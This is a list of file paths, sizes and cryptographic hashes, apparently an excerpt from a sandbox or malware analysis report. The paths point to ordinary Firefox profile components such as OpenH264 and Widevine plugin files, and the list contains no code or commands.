C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\69e58556-5e23-4ae0-8665-470032812a0b
Filesize29KB
MD573dc10a9518e820ec7aee1795587d5f1
SHA11edb34f639200c9e0f8c8a240c4b7300aed1ed2f
SHA25621c340326dac457e41721152fa9b30ed59f5830b104ffffed8f0f335e90a452a
SHA5129bf223b9a65d8fef2761911eb719e20e0f6b11738a81956965ceb517a762081442b05db3e799d7a9af77dc1880b3cf85ca7919daa5bc8aadd7bf568c50b74f96
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\LICENSE.txt.tmp
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
10KB
MD5203ac07ee605c52c9f70716773492714
SHA16b397400bb67bf9fe25435ac081d33f1d348284a
SHA256929d8f6297af8fd6f7e97d4fa84689faf6b89325364cc6214a24cef4a9bc0d9e
SHA512753a69ee20505fdf5fada8be022f90fa7fbaedf98793afca290236f86d7103d69b189b710d04eba6611c206d4ecb4e87639bdf6849354aed744facc56607a2b5
-
Filesize
11KB
MD5890201f2fc038c39d9cb964077b206f8
SHA16e60b021b95edc386bf3f943458c192935f056e1
SHA256a335d90b70904003f217656f6cc6c647ad1c286fd1efc6afc124d1db16eac10f
SHA51238a5b58aca0a99f6d28cb26b0b4b5e8d3ea571f6f9179ffa86d77d0feaa7df0f6718fdfae3b9e6253a6451e0f82bf1a68169ff2cbd43590186d10c4e8fae52f8
-
Filesize
12KB
MD5257979e8b807ec66f194c9be58349032
SHA1ce44fa914c57c334788427ad8eb50aafd3cde358
SHA256a62bbc852f273b8844779af7e07f71b57a837327765bc8c2947a5d888967adcf
SHA512fdc29a8ff6d86a3768b1d352fd8522e5b5be42ab43f82ba7fe05af73f82970bed7102f146fcea7377af5a11a8728bf212f9de0f231e0fb6cad374fe7a641397d
-
Filesize
10KB
MD54cacd20dbdac2888dfc16000c563c8f3
SHA1decd0a5b12bfd680cc3471587397cfcc8f61d102
SHA256b6ab31af322fd5b3df0bb67568384258cc4788243ab73c83b115a1bf3bc35858
SHA5125bea0a39d35a1f0d09969d388f3cb73e8987a19ebd9a21206a60e2d3f974dee3e4d59c179faf53b3026239f33678850f4617c311a372585e69de3c8b44d57fde
-
Filesize
124KB
MD50d3418372c854ee228b78e16ea7059be
SHA1c0a29d4e74d39308a50f4fd21d0cca1f98cb02c1
SHA256885bf0b3b12b77ef3f953fbb48def1b45079faa2a4d574ee16afdbafa1de3ac7
SHA512e30dced307e04ae664367a998cd1ba36349e99e363f70897b5d90c898de2c69c393182c3afba63a74956b5e6f49f0635468e88ed31dd1e3c86c21e987ddd2c19